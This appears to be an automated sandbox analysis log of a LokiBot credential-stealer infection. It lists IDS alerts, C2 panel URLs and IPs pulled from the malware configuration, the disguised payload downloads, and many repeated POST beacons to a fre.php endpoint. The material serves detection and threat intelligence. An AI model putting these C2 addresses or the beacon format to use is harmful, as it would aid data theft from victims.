Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50068
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.243.136:80 -> 192.168.2.4:49738

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: 94.156.177.95/simple/five/fre.php

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /33/LOGLK.txt HTTP/1.1Host: 192.3.243.136Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 142.215.209.78 142.215.209.78

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: NET1-ASBG NET1-ASBG

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.243.136Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 149Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_03174BB0 URLDownloadToFileW,

1_2_03174BB0

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.243.136Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /33/LOGLK.txt HTTP/1.1Host: 192.3.243.136Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: 1017.filemail.com

Source: unknown

HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.95Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B29C1220Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
